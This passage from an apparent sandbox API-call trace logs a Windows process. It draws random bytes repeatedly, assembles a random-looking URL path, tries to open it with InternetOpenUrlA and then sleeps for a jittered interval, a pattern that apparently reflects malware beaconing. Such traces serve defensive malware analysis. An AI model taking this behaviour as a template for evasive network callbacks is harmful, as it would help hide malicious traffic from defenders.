dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.573] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.573] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.573] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.573] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.574] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.574] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.574] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.574] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.575] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.575] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.575] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.577] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.577] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.577] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.577] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.580] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.580] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.580] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.580] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.580] GetProcessHeap () returned 0x440000 [0248.580] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473140 [0248.580] lstrcpyA (in: lpString1=0x473140, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0248.580] lstrcatA (in: lpString1="\x04", lpString2="/zM4kdjs4ef9fhrjed2vovd7WmLgPchg06/m0poxibhWoLv2kpsziocrT/xa1m2zxtobmo73z4m7cetgnc3cnsgMZpad7cgUor7qbd/" | out: lpString1="\x04/zM4kdjs4ef9fhrjed2vovd7WmLgPchg06/m0poxibhWoLv2kpsziocrT/xa1m2zxtobmo73z4m7cetgnc3cnsgMZpad7cgUor7qbd/") returned="\x04/zM4kdjs4ef9fhrjed2vovd7WmLgPchg06/m0poxibhWoLv2kpsziocrT/xa1m2zxtobmo73z4m7cetgnc3cnsgMZpad7cgUor7qbd/" [0248.581] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0248.581] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/zM4kdjs4ef9fhrjed2vovd7WmLgPchg06/m0poxibhWoLv2kpsziocrT/xa1m2zxtobmo73z4m7cetgnc3cnsgMZpad7cgUor7qbd/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0248.581] GetProcessHeap () returned 0x440000 [0248.581] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473140 | out: hHeap=0x440000) returned 1 [0248.581] GetProcessHeap () returned 0x440000 [0248.581] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a175c0 | out: hHeap=0x440000) returned 1 [0248.581] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0248.581] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0248.582] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0248.582] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0248.582] Sleep (dwMilliseconds=0x18e07) [0248.722] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0248.723] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0248.723] GetProcessHeap () returned 0x440000 [0248.723] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a02250 [0248.723] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0248.724] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.724] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02251, cbBuffer=0x19, dwFlags=0x2 | out: pbBuffer=0x3a02251) returned 0x0 [0248.724] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.724] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0248.724] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.724] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.724] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.724] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.725] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.725] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.725] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.726] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.726] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.726] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.925] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.926] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.926] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.926] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.927] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.927] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.928] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.928] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.928] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.928] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.929] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0248.929] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a0226a, cbBuffer=0x22, dwFlags=0x2 | out: pbBuffer=0x3a0226a) returned 0x0 [0248.929] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.930] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.930] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.930] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.931] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.931] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.931] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.932] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.932] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.932] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.933] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.933] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.933] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.934] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.934] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.934] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.935] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.935] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.935] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.935] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.936] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.936] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.936] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.936] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.937] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.937] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.937] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0248.937] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a0228c, cbBuffer=0x13, dwFlags=0x2 | out: pbBuffer=0x3a0228c) returned 0x0 [0248.937] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.938] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.938] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.939] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.939] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.939] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.940] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.940] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.940] 